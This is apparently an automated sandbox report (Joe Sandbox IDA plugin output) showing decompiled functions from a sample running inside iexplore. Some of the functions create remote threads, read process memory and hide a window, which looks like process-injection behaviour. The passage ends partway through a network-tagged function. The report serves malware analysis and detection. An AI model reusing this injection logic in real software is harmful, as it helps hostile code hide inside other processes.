						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t37, _a8, _a12, _a16);
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0x72b26088 = 1;
					 *0x72b2602c = _t31;
					 *0x72b260b8 = _t31;
					L11:
					_t19 = E72B22EA1(_t34, _a16);
					__eflags = _t19;
					if(_t19 == 0) {
						_t20 =  *0x72b260ac; // 0x1b0
						__eflags = _t20 - _t31;
						if(_t20 != _t31) {
							 *0x72b26088 = 1;
							SetEvent(_t20);
						}
						__eflags =  *0x72b26088 - _t31; // 0x0
						if(__eflags != 0) {
							goto L17;
						} else {
							SetTimer(_t37, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t37, 0x64);
					do {
						_t26 = PeekMessageA( &_v32, _t37, 0x113, 0x113, 1);
						__eflags = _t26;
					} while (_t26 != 0);
					E72B2327B(_t34, _t35, _t37, 0x113); // executed
					__eflags =  *0x72b26038; // 0x1
					if(__eflags == 0) {
						SetTimer(_t37, 0x64, 0xdbba0, 0);
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}

0x72b2351d
0x72b23529
0x72b2352d
0x72b23530
0x72b23531
0x72b235f4
0x72b235f7
0x72b23602
0x72b2360b
0x72b23611
0x72b23611
0x72b23616
0x72b2361c
0x72b23620
0x72b235c0
0x72b235c0
0x72b23632
0x72b23636
0x72b23636
0x72b23622
0x72b2362c
0x00000000
0x72b2362c
0x72b23537
0x72b2353a
0x72b235a1
0x72b235a8
0x72b235ae
0x72b235b4
0x72b235b7
0x72b235bc
0x72b235be
0x72b235c4
0x72b235c9
0x72b235cb
0x72b235ce
0x72b235d5
0x72b235d5
0x72b235db
0x72b235e1
0x00000000
0x72b235e3
0x72b235ec
0x00000000
0x72b235ec
0x72b235e1
0x00000000
0x72b235be
0x72b2353c
0x72b23541
0x72b2354f
0x72b23553
0x00000000
0x00000000
0x72b2355c
0x72b23567
0x72b23570
0x72b23576
0x72b23576
0x72b2357a
0x72b23581
0x72b23587
0x72b23596
0x72b23596
0x00000000
0x72b23587
0x72b23548
0x00000000
0x00000000
0x00000000

APIs

KillTimer.USER32(?,00000064), ref: 72B2355C
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B23570
SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B23596
SetEvent.KERNEL32(000001B0), ref: 72B235D5
SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B235EC
KillTimer.USER32(?,00000064), ref: 72B235F7
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B2360B
PostQuitMessage.USER32(00000000), ref: 72B23616
DefWindowProcA.USER32(?,00000011,?,?), ref: 72B2362C

Strings

d, xrefs: 72B2354F

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
String ID: d
API String ID: 2149785620-2564639436
Opcode ID: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
Instruction ID: 41688d1bd847d3f0796b27d825ea33bda349e247ae9f5fafea2125377e32a201
Opcode Fuzzy Hash: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
Instruction Fuzzy Hash: C731D132690314ABE7225A29CC8AF9B3AFDEB45797F11081CF50ED2183D3718558DB21

Uniqueness

Uniqueness Score: -1.00%

Function 72B22314, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E72B22314() {
				int _t42;
				int _t45;
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0x72b253c8);
				E72B24A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				_t42 = ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34); // executed
				if(_t42 == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				_t45 = ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34); // executed
				if(_t45 == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34); // executed
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E72B215CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E72B2162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}

0x72b22314
0x72b22319
0x72b2231e
0x72b22323
0x72b2232f
0x72b22331
0x72b2233f
0x72b2234a
0x72b2234e
0x72b2241b
0x72b2241b
0x72b22422
0x72b22422
0x72b2235e
0x72b22363
0x72b22367
0x00000000
0x00000000
0x72b22371
0x72b223a7
0x72b223ab
0x00000000
0x00000000
0x72b223bf
0x72b223c1
0x72b223c3
0x00000000
0x00000000
0x72b223c5
0x72b223c8
0x72b223cb
0x72b223ce
0x72b223d1
0x72b223d8
0x72b223db
0x72b223de
0x72b223e3
0x72b223e3
0x72b223e9
0x72b223e9
0x72b223de
0x72b223f9
0x00000000
0x72b2237c
0x72b22383
0x72b22400
0x72b22400
0x72b2240a
0x72b22385
0x72b22388
0x72b22392
0x72b2239c
0x72b22394
0x72b22394
0x72b22394
0x72b223a2
0x72b223a2
0x72b223a2
0x00000000
0x72b22383

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22329
ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2234A
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22363
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22394
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2239C
ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 72B223BF
ExitThread.KERNEL32 ref: 72B22422

Strings

x, xrefs: 72B2236D

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: MemoryProcessRead$Event$ExitHandleResetThread
String ID: x
API String ID: 2307309678-2363233923
Opcode ID: 0270a9b1eb6f4bfed88db63639d28868d063afc6ed73b52d124a0367130b2273
Instruction ID: 39cbffadf330a72c51dfe75118ffe555f1184d41082d0e839d6b4843e77be50f
Opcode Fuzzy Hash: 0270a9b1eb6f4bfed88db63639d28868d063afc6ed73b52d124a0367130b2273
Instruction Fuzzy Hash: 3E313A71910319EFEB11CBA9CE84EEEBBF9FB08316F104129E516F2091D774AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 72B23161, Relevance: 10.6, APIs: 7, Instructions: 62
windowregistrytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E72B23161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				struct HWND__* _t14;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x72b25430);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x72b260c4; // 0x72b20000
				 *0x72B26070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x72B26084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x72b26060); // executed
				_t14 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0); // executed
				 *0x72b2600c = _t14;
				_t15 =  *0x72b26038; // 0x1
				asm("sbb eax, eax");
				SetTimer( *0x72b2600c, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0); // executed
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34); // executed
				}
				 *0x72b2600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E72B2159C(0, _t30);
			}

0x72b23161
0x72b23166
0x72b2316b
0x72b23172
0x72b2317d
0x72b23182
0x72b23192
0x72b23198
0x72b231a5
0x72b231ab
0x72b231b1
0x72b231b7
0x72b231bd
0x72b231c4
0x72b231d9
0x72b231df
0x72b231f4
0x72b231fe
0x72b231fe
0x72b23206
0x72b23215
0x72b23220

APIs

GetModuleFileNameA.KERNEL32(72B20000,?,00000103,72B26060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,72B20000,00000000), ref: 72B231A5
RegisterClassA.USER32 ref: 72B231AB
CreateWindowExA.USER32 ref: 72B231B1
SetTimer.USER32(00000064,-0000EA5F,00000000), ref: 72B231D9
GetMessageA.USER32 ref: 72B231E6
TranslateMessage.USER32(?), ref: 72B231F4
DispatchMessageA.USER32 ref: 72B231FE

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
String ID:
API String ID: 2359640614-0
Opcode ID: 78df0df3dc89c525d75cd91ed21fe3ae8a5e16b9aebee664f3239ca738d4170b
Instruction ID: 29b8b4f74a95a23194c38b4f8543aa8665ab8fa1b511f83a033bb6963feef6d0
Opcode Fuzzy Hash: 78df0df3dc89c525d75cd91ed21fe3ae8a5e16b9aebee664f3239ca738d4170b
Instruction Fuzzy Hash: 991160B2990314EFD7209F66CC89E6B7BFCFB95782B21491DB405D3182D7304944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B21F95, Relevance: 9.1, APIs: 6, Instructions: 113
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E72B21F95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t57;
				void* _t62;
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t84;
				signed int _t95;

				_t78 = __edx;
				_push(0x6c0);
				_push(0x72b253a8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x24)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E72B24D2D(_t84 - 0x3a0, 0, 0x32e);
				 *((short*)(_t84 - 0x398)) = 0x32a;
				E72B24D14(_t84 - 0x6d0, _t84 - 0x3a0, 0x32e);
				E72B24D44(_t84 - 0x70, _t84 - 0x6c8, _t84 - 0x398);
				 *((intOrPtr*)(_t84 - 0x3c)) = E72B25277;
				 *((intOrPtr*)(_t84 - 0x38)) = E72B25313;
				 *((intOrPtr*)(_t84 - 0x34)) = E72B2224A;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x30) = _t83;
				 *_t83 = 0x237;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x24)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E72B23223(E72B21C7B), _t83, 4, _t84 - 0x28); // executed
					 *(_t84 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t84 + 8) = E72B21829;
				if( *((intOrPtr*)(_t83 + 0x6c)) == 4) {
					 *(_t84 + 8) = 0;
				}
				_t75 = _t83 + 0x1bc8;
				_t57 = E72B21775(_t83, _t83 + 0x1bc8, 0, 2); // executed
				if(_t57 == 0) {
					L15:
					return E72B2159C(E72B24DC6(_t78, _t95, _t84 - 0x70), _t78);
				} else {
					_t62 = E72B21775(_t83, _t83 + 0x78,  *(_t84 + 8), 1); // executed
					if(_t62 == 0) {
						goto L15;
					}
					 *(_t84 - 4) = 0;
					if( *((intOrPtr*)(_t84 - 0x24)) == 0) {
						E72B22429(_t75, 0);
					}
					if( *(_t84 - 0x1c) == 0) {
						do {
							_push(_t84 - 0x70);
							__eflags = E72B21D27(_t75, _t78, 0, _t83, __eflags);
						} while (__eflags != 0);
						goto L14;
					} else {
						ResumeThread( *(_t84 - 0x1c)); // executed
						WaitForMultipleObjects(2, _t84 - 0x20, 0, 0xffffffff);
						CloseHandle( *(_t84 - 0x1c));
						L14:
						_t42 = _t84 - 4;
						 *_t42 =  *(_t84 - 4) | 0xffffffff;
						_t95 =  *_t42;
						goto L15;
					}
				}
			}

0x72b21f95
0x72b21f95
0x72b21f9a
0x72b21f9f
0x72b21fa6
0x72b21fa9
0x72b21fac
0x72b21fb9
0x72b21fca
0x72b21fd2
0x72b21fe8
0x72b21fff
0x72b22004
0x72b2200b
0x72b22012
0x72b22019
0x72b2201c
0x72b2201f
0x72b22025
0x72b2202f
0x72b2203a
0x72b22041
0x72b2205f
0x72b22065
0x72b2206a
0x72b2206c
0x72b2206c
0x72b2206a
0x72b22073
0x72b2207e
0x72b22080
0x72b22080
0x72b22083
0x72b2208e
0x72b22095
0x72b220fb
0x72b22109
0x72b22097
0x72b220a1
0x72b220a8
0x00000000
0x00000000
0x72b220aa
0x72b220b0
0x72b220b4
0x72b220b4
0x72b220bc
0x72b220e1
0x72b220e4
0x72b220ea
0x72b220ea
0x00000000
0x72b220be
0x72b220c1
0x72b220d0
0x72b220d9
0x72b220f7
0x72b220f7
0x72b220f7
0x72b220f7
0x00000000
0x72b220f7
0x72b220bc

APIs

GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7

Part of subcall function 72B24D44: GetVersion.KERNEL32(?,72B26150,00000034,0000032E,?,72B22004,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B24D61

GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
CloseHandle.KERNEL32(00000000), ref: 72B220D9

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Handle$Thread$CloseCreateMultipleObjectsRemoteResumeVersionWait
String ID:
API String ID: 3869061129-0
Opcode ID: bb151290f7270c56c43afc32b5ce531f27b59d51cec2e0ace73879a3adb713dd
Instruction ID: 355344fad5c52479a02bf13cfb35cb00ff9462887997cb78211b3fa50bd0aa08
Opcode Fuzzy Hash: bb151290f7270c56c43afc32b5ce531f27b59d51cec2e0ace73879a3adb713dd
Instruction Fuzzy Hash: A4418BB1C00318ABDF21CFA9CC84EDFBAF8EF84351F10461AE55AA6091E7745A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 72B22FF9, Relevance: 9.1, APIs: 6, Instructions: 97
threadwindowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B22FF9(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _v92;
				char _v144;
				struct tagMSG _v172;
				void* _t31;
				void* _t42;
				void* _t48;
				char* _t53;
				void* _t56;
				char _t60;

				E72B24D2D( &_v144, 0, 0x80);
				_v8 = 3;
				while(1) {
					L1:
					_v8 = _v8 - 1;
					_t31 = _v8 - 1;
					_v12 = 0;
					if(_t31 == 0) {
						break;
					}
					if(_t31 != 1) {
						L12:
						E72B22D40( &_v144);
						return PostMessageA( *0x72b2600c, 0x400, 1, 2);
					}
					_t54 = _a4;
					_t8 =  *_a4 + 6; // 0x4
					_t53 = _t8;
					_t60 =  *0x72b260ce; // 0x0
					if(_t60 != 0) {
						_t53 = 0x72b260ce;
					}
					_t48 = E72B22D7F( &_v144, _t53, _t45 + 2,  *((intOrPtr*)(_t54 + 4))); // executed
					if(_t48 > 0) {
						if(PeekMessageA( &_v172, 0, 0x12, 0x12, 0) == 0) {
							continue;
						}
					}
					goto L12;
				}
				_t56 = LocalAlloc(0x40, 0x4464);
				if(_t56 != 0) {
					 *(_t56 + 0x70) =  *(_t56 + 0x70) | 0xffffffff;
					 *(_t56 + 0x5c) =  *(_t56 + 0x5c) | 0x00000004;
					 *((intOrPtr*)(_t56 + 0x3ba8)) = GetCurrentThreadId();
					_t18 = _t56 + 0x3c58; // 0x3c58
					E72B24D14(_t18,  &_v144, 0x80);
					 *((intOrPtr*)(_t56 + 0x6c)) = 3;
					_t42 = CreateThread(0, 0, E72B21C2C, _t56, 0,  &_v16); // executed
					 *(_t56 + 0x3ba4) = _t42;
					if(_t42 != 0) {
						_v92 = 0;
						_v12 = 1;
						SetThreadPriority( *(_t56 + 0x3ba4), 0xfffffff1); // executed
					}
				}
				E72B21F30(_t56, _v12);
				if(_v12 != 0) {
					goto L1;
				} else {
					goto L12;
				}
			}

0x72b23015
0x72b2301a
0x72b23021
0x72b23021
0x72b23021
0x72b23027
0x72b23028
0x72b2302b
0x00000000
0x00000000
0x72b2302e
0x72b2310a
0x72b23111
0x72b2312f
0x72b2312f
0x72b23034
0x72b23039
0x72b23039
0x72b2303c
0x72b23042
0x72b23044
0x72b23044
0x72b23058
0x72b2305f
0x72b2307a
0x00000000
0x00000000
0x72b2307c
0x00000000
0x72b2305f
0x72b2308e
0x72b23092
0x72b23094
0x72b23098
0x72b230a2
0x72b230b0
0x72b230b7
0x72b230c9
0x72b230d0
0x72b230d6
0x72b230de
0x72b230e2
0x72b230eb
0x72b230f2
0x72b230f2
0x72b230de
0x72b230fc
0x72b23104
0x00000000
0x00000000
0x00000000
0x00000000

APIs

PeekMessageA.USER32(?,00000000,00000012,00000012,00000000), ref: 72B23072
LocalAlloc.KERNEL32(00000040,00004464,?,00000000,00000080), ref: 72B23088
GetCurrentThreadId.KERNEL32 ref: 72B2309C
CreateThread.KERNEL32(00000000,00000000,72B21C2C,00000000,00000000,?), ref: 72B230D0
SetThreadPriority.KERNEL32(?,000000F1), ref: 72B230F2
PostMessageA.USER32 ref: 72B23125

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Thread$Message$AllocCreateCurrentLocalPeekPostPriority
String ID:
API String ID: 2250156434-0
Opcode ID: abc693c2b54a9fea2a3e5a45b99c7ce19da87f2b526a230208ad191b8d5988ec
Instruction ID: 600c3e933443d6e78f6ca0bd9c7fa0cb8a0584d99d1a0196c81ce118fa489354
Opcode Fuzzy Hash: abc693c2b54a9fea2a3e5a45b99c7ce19da87f2b526a230208ad191b8d5988ec
Instruction Fuzzy Hash: 1A316171900704BFDB219BA9CC49FCBBBFCEB84746F104559F65AE6181E7709A48CB20

Uniqueness

Uniqueness Score: -1.00%

Function 72B21775, Relevance: 7.6, APIs: 5, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B21775(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				void* _t28;
				void* _t32;
				void* _t40;

				_t40 = _a8;
				_t21 =  *(_t40 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t40 + 0x1b44) = _t21 | 0x00000001;
					_t7 = _a4 + 0x70; // 0x840f4800
					 *((intOrPtr*)(_t40 + 0x1b48)) = _a4;
					 *((intOrPtr*)(_t40 + 0x1b14)) =  *_t7;
					InitializeCriticalSection(_t40 + 0x1b18);
					 *((intOrPtr*)(_t40 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t28 = CreateEventA(0, 1, 0, 0);
					 *(_t40 + 0x1b10) = _t28;
					if( *((intOrPtr*)(_t40 + 0x1b40)) == 0 || _t28 == 0) {
						L6:
						E72B216BA(_t40);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t40 + 0x1b0c), _a16); // executed
						} else {
							_t32 = CreateThread(0, 0, _a12, _t40, 0,  &_a8); // executed
							 *(_t40 + 0x1b0c) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return  *(_t40 + 0x1b44) & 1;
			}

0x72b21779
0x72b2177c
0x72b21784
0x72b2178c
0x72b21795
0x72b21799
0x72b217a7
0x72b217ad
0x72b217c7
0x72b217cd
0x72b217cf
0x72b217db
0x72b21812
0x72b21813
0x72b217e1
0x72b217e4
0x72b21801
0x72b2180a
0x72b217e6
0x72b217f1
0x72b217f7
0x72b217ff
0x00000000
0x00000000
0x00000000
0x00000000
0x72b217ff
0x72b217e4
0x72b21819
0x72b21826

APIs

InitializeCriticalSection.KERNEL32(?,00000000,?,?,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217AD
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217C0
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E), ref: 72B217CD
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72B217F1
SetThreadPriority.KERNEL32(?,?,?,72B22093,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?,00000000), ref: 72B2180A

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Create$EventThread$CriticalInitializePrioritySection
String ID:
API String ID: 2454249074-0
Opcode ID: c8a72f0a4be396ac6ee2950f9911c6e9136fd36da346fd89e7378417be704383
Instruction ID: 2b7b849261d314237348428b04d03b57a499ce12b49900591cbacb009e5b40d1
Opcode Fuzzy Hash: c8a72f0a4be396ac6ee2950f9911c6e9136fd36da346fd89e7378417be704383
Instruction Fuzzy Hash: 41117C32110784AFC7319F2ACC84EE7BBF9FBC9751B14891EF96A86102E331A440DB60

Uniqueness

Uniqueness Score: -1.00%

Function 72B2253C, Relevance: 7.5, APIs: 5, Instructions: 36
threadsynchronizationinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B2253C(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t9;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t9 = CreateRemoteThread(_t7, 0, 0, E72B23223(E72B22314), _a4, 0,  &_v12); // executed
				_t19 = _t9;
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

0x72b22541
0x72b22548
0x72b22569
0x72b2256f
0x72b22573
0x72b22578
0x72b22583
0x72b2258a
0x72b2258a
0x72b22595

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22548
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 72B22569
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22578
GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B22583
CloseHandle.KERNEL32(00000000,?,?,?,72B227C2,?,?,?,?,?,72B2164B,?,?,?), ref: 72B2258A

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: HandleThread$CloseCodeCreateExitObjectRemoteSingleWait
String ID:
API String ID: 3128336559-0
Opcode ID: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
Instruction ID: 009471020fc4e506f9a1f4f8785b6e6bc51251f61989519d315005196ebec4ca
Opcode Fuzzy Hash: 2b8f83884517cb3ba26775e358e24cda4cd880b66a82d5994a4a5c0914fcdb4e
Instruction Fuzzy Hash: 9CF09077450344BFDB118795CC49FAF36F8DB857A1F310618F615A31C2DB74A5019725

Uniqueness

Uniqueness Score: -1.00%

Function 72B2294C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E72B2294C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				short* _t19;
				int _t24;
				short _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t32;
				void* _t33;

				_t29 = __edx;
				_push(0x8c);
				_push(0x72b253d8);
				E72B24A94(__ebx, _t30, __esi);
				_t32 =  *((intOrPtr*)(_t33 + 8));
				_t19 = _t32 + 0x3cb0;
				if( *_t19 == 0) {
